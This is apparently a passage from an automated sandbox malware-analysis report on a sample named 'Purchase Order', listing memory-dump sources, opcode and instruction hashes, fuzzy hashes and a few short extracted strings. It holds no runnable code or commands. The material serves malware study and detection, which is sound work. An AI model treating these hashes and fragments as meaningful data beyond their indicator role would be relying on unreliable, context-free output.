                                                                            • Instruction Fuzzy Hash: 18A19175E012288FEB68DF6AD944B9DBBF2BF89310F14C0AAD40DA7254DB305A85CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 16b61cd0ceb490f0f48abdb73a9fdb55f11bf8e213819c07e264f826d29f33e8
                                                                            • Instruction ID: e53284d6a7969c01a3955edaa7a4f47ebec35716019c71df3ccf7a506ea91e0f
                                                                            • Opcode Fuzzy Hash: 16b61cd0ceb490f0f48abdb73a9fdb55f11bf8e213819c07e264f826d29f33e8
                                                                            • Instruction Fuzzy Hash: DDA1A074E012288FEB68CF6AC945B9DBBF2BF89310F14C0AAD40DA7255DB305A85CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 94b7c6c372efaec466fd6c4f8188f685e2da10caeb9312609252cdc6566be7cd
                                                                            • Instruction ID: 2dab7c6f7f287a48668582c9346aa24d63ff2702d8d98ad0e9ef59b783b4f96d
                                                                            • Opcode Fuzzy Hash: 94b7c6c372efaec466fd6c4f8188f685e2da10caeb9312609252cdc6566be7cd
                                                                            • Instruction Fuzzy Hash: 93A19075E012288FEB68DF6AC944B9DFBF2AF89310F14C0AAD409A7254DB345A85CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b69f0085f2253f9aa92ddf07054a137445d87b5f6bbf4169ecc23768195314c8
                                                                            • Instruction ID: 42fcdbced389fa42760df410b705f82d043bf935e6654b821c08e25e2ad16f06
                                                                            • Opcode Fuzzy Hash: b69f0085f2253f9aa92ddf07054a137445d87b5f6bbf4169ecc23768195314c8
                                                                            • Instruction Fuzzy Hash: 0BA19F75E016288FEB68DF6AC945B9DBBF2BF89310F14C0AAD408A7254DB305A85CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 783c2bd4d7371ed250da81582254157211b673ad0091d4323a5f8ccc7d718353
                                                                            • Instruction ID: 66c2ef1bb644a2809657fec53196a19cfb91b5a5090dd48732764b3450ed34b2
                                                                            • Opcode Fuzzy Hash: 783c2bd4d7371ed250da81582254157211b673ad0091d4323a5f8ccc7d718353
                                                                            • Instruction Fuzzy Hash: 49A18175E012288FEB68DF6AC944B9DFBF2AF89310F14C0AAD40DA7254DB305A85CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6b31b57dc229605ee42ad27e1719c7ddc757edccd05139bd85ccd085f6beb866
                                                                            • Instruction ID: 971f15bfa17480d90ef9d7bcad2e36a9763d6ece9706d6285953f17122676e2d
                                                                            • Opcode Fuzzy Hash: 6b31b57dc229605ee42ad27e1719c7ddc757edccd05139bd85ccd085f6beb866
                                                                            • Instruction Fuzzy Hash: E2718771E016288FEB68CF6AC945B9DFAF2AF89300F14C0AAD50DA7254DB345A85CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 324678d87acf5259ce1197bf852206b594e981eeae0f0d3d99fca924712f19bb
                                                                            • Instruction ID: fadc14df0b4bbc1a0c0a9d62b3450dda19575fcb6310ac9ee898ba7ea66a7276
                                                                            • Opcode Fuzzy Hash: 324678d87acf5259ce1197bf852206b594e981eeae0f0d3d99fca924712f19bb
                                                                            • Instruction Fuzzy Hash: 04718771E016288FEB68CF6AC94579DFBF2AF89300F14C1AAD40DA7254DB305A85CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6891c471c230df85eba4e517c242c9ef8bda8b53d9863e76b7367cecb6420a3d
                                                                            • Instruction ID: 29c2cc6e00bdb95a33ee692c1da9070b074f4eaa2a8fe6922dca23604e8a6d8d
                                                                            • Opcode Fuzzy Hash: 6891c471c230df85eba4e517c242c9ef8bda8b53d9863e76b7367cecb6420a3d
                                                                            • Instruction Fuzzy Hash: 01717571E016288FEB68CF6AC944B9DFAF2BF89300F14C1AAD40DA7254DB345A85CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0ef689efb2889506eb92171b5a1a627feb3504682400c631f5f11d0db575d0a2
                                                                            • Instruction ID: 30474752c347abcb865c9ad91bd5c58c9f4d0e076a5cea544942f760a0345cfb
                                                                            • Opcode Fuzzy Hash: 0ef689efb2889506eb92171b5a1a627feb3504682400c631f5f11d0db575d0a2
                                                                            • Instruction Fuzzy Hash: 6E41D3B1E012088BEB54DFAAC9547DEFBB2BF89300F64C06AC418AB294DB755946CF54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a10d47a08e79f013d83efa39c33a87c1a12a0690edf03c1c3a9ec45ea5097780
                                                                            • Instruction ID: cdef64fe7bee1e6102516fa5b733e4a311fd2f367e3cc5e45aef1f8e2b375fe0
                                                                            • Opcode Fuzzy Hash: a10d47a08e79f013d83efa39c33a87c1a12a0690edf03c1c3a9ec45ea5097780
                                                                            • Instruction Fuzzy Hash: 66416CB1E016188FEB58CF6BC9457D9FAF3AFC8310F14C1AAC50CA6264DB740A858F51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cf53907cf6203525efb9a817c8e417cd21ff4d71e00328fc429ddb1fd8fc251b
                                                                            • Instruction ID: 4f7bb33a18873236b8546d9fc4086709e7ae7886c29f3e9223205a97694bf97f
                                                                            • Opcode Fuzzy Hash: cf53907cf6203525efb9a817c8e417cd21ff4d71e00328fc429ddb1fd8fc251b
                                                                            • Instruction Fuzzy Hash: B74158B1E016189BEB58CF6BCD457D9FAF3AFC8314F14C1AAC50CA6264DB740A868F51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fffc95b8bef6783a9e40d53d92c7438f6c66a1e1e0db1ccd37d9528c8b4ebbf4
                                                                            • Instruction ID: 8b6e25c7dcd721d446e0c1c43c3e0fedb837c562a6c86622693d5fe62cd508b2
                                                                            • Opcode Fuzzy Hash: fffc95b8bef6783a9e40d53d92c7438f6c66a1e1e0db1ccd37d9528c8b4ebbf4
                                                                            • Instruction Fuzzy Hash: F24148B1E016189BEB58CF6BC9457D9FAF3AFC8310F14C1AAC50CA6264DB741A86CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 53e96af3f008c9fcb0d7fdc1f010d4bbd594345d8e01960abc09858a126763c1
                                                                            • Instruction ID: a6e0cb0488218b2da4bb13749d6e468af9de3b1d533795726914f330715d35ad
                                                                            • Opcode Fuzzy Hash: 53e96af3f008c9fcb0d7fdc1f010d4bbd594345d8e01960abc09858a126763c1
                                                                            • Instruction Fuzzy Hash: D64159B1E016189BEB58CF6BCD557D9FAF3AFC8300F04C1AAC50CA6264DB740A868F51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 79253b6024180a730d4849b19676a260b99e0fc12c50b7f089bf3fae65bd9bed
                                                                            • Instruction ID: 5a5621a37e85de06cb722df37e880d69e0b867f98281a31f4edca418a5a8b5a5
                                                                            • Opcode Fuzzy Hash: 79253b6024180a730d4849b19676a260b99e0fc12c50b7f089bf3fae65bd9bed
                                                                            • Instruction Fuzzy Hash: 4E4158B1E016189BEB58CF6BCD557D9FAF3AFC8304F04C1AAC50CA6264DB740A868F51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b8fc4d3cc4e422dd9bad74a16b6773315d6033d557bd3a6fe4a68a5399a7f8d1
                                                                            • Instruction ID: 4ebe432b3cf8ed8891b979b5afa9d800fc992694f22c552a30976e949ef61c1a
                                                                            • Opcode Fuzzy Hash: b8fc4d3cc4e422dd9bad74a16b6773315d6033d557bd3a6fe4a68a5399a7f8d1
                                                                            • Instruction Fuzzy Hash: 7E4157B1E016188BEB58CF6BD9457D9FAF3BFC8300F14C1AAC50CA6264DB740A858F51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fc028357a8613c2e0d62196e14990fd662f7bba8419cec4bbfb5ee6df828e03f
                                                                            • Instruction ID: 84d18b85026a89a5b59af93fa095617bcbd071b65049496b012e16e2ba36ab77
                                                                            • Opcode Fuzzy Hash: fc028357a8613c2e0d62196e14990fd662f7bba8419cec4bbfb5ee6df828e03f
                                                                            • Instruction Fuzzy Hash: 5841D370E052488BDB58DFAAD99469EFBB2EF89300F20D12AC418BB269DB345945CF54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
                                                                            • API String ID: 0-1435242062
                                                                            • Opcode ID: 2dc8bde22c1b76e66825f5258e24ebe66be96280b505efacaaf70f79a2f487b4
                                                                            • Instruction ID: 795ff6433098475402f27c98070b79e6ba7708797f4caa5a79a906874137fb2a
                                                                            • Opcode Fuzzy Hash: 2dc8bde22c1b76e66825f5258e24ebe66be96280b505efacaaf70f79a2f487b4
                                                                            • Instruction Fuzzy Hash: BC127D31A00229CFCB15CF69D884A9EBBF2FF5A314F258559E945DB2A1D730ED41CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$;]q
                                                                            • API String ID: 0-1096896373
                                                                            • Opcode ID: 61030e94eec7ff9dc9fc7f59072fc5587d72e72a6015b4ca3d4d3ab0b4d7dd61
                                                                            • Instruction ID: 36c09958170b79f8afd9b569cd373444765b6829246edad3a9ab367f572fb395
                                                                            • Opcode Fuzzy Hash: 61030e94eec7ff9dc9fc7f59072fc5587d72e72a6015b4ca3d4d3ab0b4d7dd61
                                                                            • Instruction Fuzzy Hash: 19F18E723012218FEB199BADC954B3D7AD6BF86650F1844AAE502DF3E2EB25CC41CB51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $]q$$]q
                                                                            • API String ID: 0-127220927
                                                                            • Opcode ID: 316cc67f4cf9b318c2b911c02fd3489419a0ff34844e73190e921a45a77fbfc7
                                                                            • Instruction ID: f99c4a369ae48e9b8cadc56430740ac5d169afe86bf48b1377554e9712f536ba
                                                                            • Opcode Fuzzy Hash: 316cc67f4cf9b318c2b911c02fd3489419a0ff34844e73190e921a45a77fbfc7
                                                                            • Instruction Fuzzy Hash: 24522274A00219CFEB549FA5C8A0BDEBB76FB94300F1081AAC10A6B3A5DF345D85DF65
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Haq$Haq
                                                                            • API String ID: 0-4016896955
                                                                            • Opcode ID: f95e1437c08701b1bc8e3dfac6b4500143080996cb036d53a0dc0f0a947c3d3d
                                                                            • Instruction ID: 6acfcb5aa59f426d4c0f7a73376482efd49633d5de19a4f5133a36ff87e974d2
                                                                            • Opcode Fuzzy Hash: f95e1437c08701b1bc8e3dfac6b4500143080996cb036d53a0dc0f0a947c3d3d
                                                                            • Instruction Fuzzy Hash: 09B1C1323142258FDB169F29C494BBE7BE2BB8A251F184869E446CF3D1EF74D841C7A0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ,aq$,aq
                                                                            • API String ID: 0-2990736959
                                                                            • Opcode ID: be8a12157735f6606616fee8f0b1ac17eac42025e62156458c764f2950500c10
                                                                            • Instruction ID: 3b99118b6ebc5562f85839cfe882e863d88129ccf0a9cb664e1effcb941bd2dd
                                                                            • Opcode Fuzzy Hash: be8a12157735f6606616fee8f0b1ac17eac42025e62156458c764f2950500c10
                                                                            • Instruction Fuzzy Hash: 8581A136A201258FDB14CF6DC4889EEBBF2BF8A210B5585A9D505DF3A1E731E842CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (&]q$(aq
                                                                            • API String ID: 0-1602648543
                                                                            • Opcode ID: 2a1de0c2d70ee2de6e9c326106975e4bdf09c86ef6156a91bf520c1b6c6f03fc
                                                                            • Instruction ID: a3b7dabb16972d0802547a369c73285856e0dd80ed93a6dfba648d0a56591ace
                                                                            • Opcode Fuzzy Hash: 2a1de0c2d70ee2de6e9c326106975e4bdf09c86ef6156a91bf520c1b6c6f03fc
                                                                            • Instruction Fuzzy Hash: 07717131F006199BDB59DFB9C8506EEBBB2AF98710F14842DD405A7380DF30AE46C7A1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Xaq$Xaq
                                                                            • API String ID: 0-1488805882
                                                                            • Opcode ID: d8ba8ec66d6e17af22a1b1b21391c08ca7b1f98889bf8418a483905816f9892e
                                                                            • Instruction ID: 75afe52cd5d11dbf4878deb23ae6b34a00ae90966bf5a92fec8c232f0c9961d7
                                                                            • Opcode Fuzzy Hash: d8ba8ec66d6e17af22a1b1b21391c08ca7b1f98889bf8418a483905816f9892e
                                                                            • Instruction Fuzzy Hash: 6631C637B0023587DB9E4A6D949827E6AE6BBCE210F184439E906CB3C4DF7DC84586E1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LR]q
                                                                            • API String ID: 0-3081347316
                                                                            • Opcode ID: a29bf17c03b9c1f6a9b7672b260f134e7f1d172be4dcb004387ae9fab1a6022b
                                                                            • Instruction ID: ad7af0692a66f5d347aa1565848d95cf27f49e7aba809f75e64fa9fe19c0dd7f
                                                                            • Opcode Fuzzy Hash: a29bf17c03b9c1f6a9b7672b260f134e7f1d172be4dcb004387ae9fab1a6022b
                                                                            • Instruction Fuzzy Hash: 6D22BB74A1121EEFCB54EF64E994A9DBBB2FF48301F1085A6E809A7358DB306D85CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LR]q
                                                                            • API String ID: 0-3081347316
                                                                            • Opcode ID: 69862cf6b33f6a21af399d64dd653719ddc33fb8003f49dbb41bd4b472057d4c
                                                                            • Instruction ID: 844411907cfbd535eabe15d7302550c93d265f5ea5f284034244f44d62610d08
                                                                            • Opcode Fuzzy Hash: 69862cf6b33f6a21af399d64dd653719ddc33fb8003f49dbb41bd4b472057d4c
                                                                            • Instruction Fuzzy Hash: 6722BA74A1121EEFCB54EF64E994A9DBBB2FF48301F1085A6E809A7358DB306D85CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (o]q
                                                                            • API String ID: 0-794736227
                                                                            • Opcode ID: 8cc314e9853434eca2ddf9189e6409153a7a0bee95e074692353502c42549155
                                                                            • Instruction ID: bc5dc15b461dad188512b0775717387835b27be27a59b850d9a28b82a1c3e47e
                                                                            • Opcode Fuzzy Hash: 8cc314e9853434eca2ddf9189e6409153a7a0bee95e074692353502c42549155
                                                                            • Instruction Fuzzy Hash: 1141E2367002199FDB099F69D9556AE7FF6FFC8620F18446AE506DB390DE309C02CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f186956760ef04828ecf21fbd4fcfa6dd543a23d4c9c7e5d491b851d46800200
                                                                            • Instruction ID: 9ae6ee05e6ef0736c114b5a7ed0cd5bf915a784903e33544aef6011d63f105ae
                                                                            • Opcode Fuzzy Hash: f186956760ef04828ecf21fbd4fcfa6dd543a23d4c9c7e5d491b851d46800200
                                                                            • Instruction Fuzzy Hash: D8F12D76A001258FCB05CF6DC588A9DBBF6FF89310F1A8499E519AB7A1DB31EC41CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e896a1406ef2fcf22f126e75a4b7d3076b2d12ead87fb917d27a15bca548e0a2
                                                                            • Instruction ID: d8d7b26f498d2c438db540e3b2b7f6fd56715a4d7811ce54191359afda17163b
                                                                            • Opcode Fuzzy Hash: e896a1406ef2fcf22f126e75a4b7d3076b2d12ead87fb917d27a15bca548e0a2
                                                                            • Instruction Fuzzy Hash: BE7107367002658FDB25DF2CC898AAD7BE5BF5A210B1544A5E905CF3B1DB74EC41CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d82b77f3da17a97bb082180da198a72df1763e2292bc96d2a345f62b96ae76e6
                                                                            • Instruction ID: 18de1762de2c3a264e491dd005172989f13c1bf34f960dbed444ea95ba79dfd4
                                                                            • Opcode Fuzzy Hash: d82b77f3da17a97bb082180da198a72df1763e2292bc96d2a345f62b96ae76e6
                                                                            • Instruction Fuzzy Hash: A3710435E002199FDB55EFA4D8585ADBBB3FF88310F14852DE916AB360DB349942CF81
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4a9e46e11043e2483c66486449c6e3414a77d2897faf3c7edede574dad49e368
                                                                            • Instruction ID: 93ab2058d32b80a287a4d12438fcef56e572c5812e271b4f084b7bb3d97fd088
                                                                            • Opcode Fuzzy Hash: 4a9e46e11043e2483c66486449c6e3414a77d2897faf3c7edede574dad49e368
                                                                            • Instruction Fuzzy Hash: 0551BF70A722429FD3983F24A9AE1BE7FB4FB1F3637456D91B01E8A4588F3110548BA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4427711915.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_6cc0000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e29ccff6a73a9fe6a43066d318026929195a29caaa140320a9d5037733615e75
                                                                            • Instruction ID: fc746c50c661133310b81494eb6221836e5821b78abcbd02c9326f865a89e4a6
                                                                            • Opcode Fuzzy Hash: e29ccff6a73a9fe6a43066d318026929195a29caaa140320a9d5037733615e75
                                                                            • Instruction Fuzzy Hash: 3B81A374E012299FDB64DF65D994BDDBBB2BF89300F1080EAE808A7254DB715E81CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 98e8962b4c3c80fa53074f17d30ae2d7ef05f757b992d442ab62dfd77ee4e3dc
                                                                            • Instruction ID: 4564d440c83378430fd308f46793592a707768a39e88aae722861ecc14666798
                                                                            • Opcode Fuzzy Hash: 98e8962b4c3c80fa53074f17d30ae2d7ef05f757b992d442ab62dfd77ee4e3dc
                                                                            • Instruction Fuzzy Hash: FB51AF74A722428FD3993F24A5AE1AE7EA4FB1F3637456D90B01E8A4188F3110548BB0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4420471784.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1520000_Purchase Order.jbxd
                                                                            Similarity
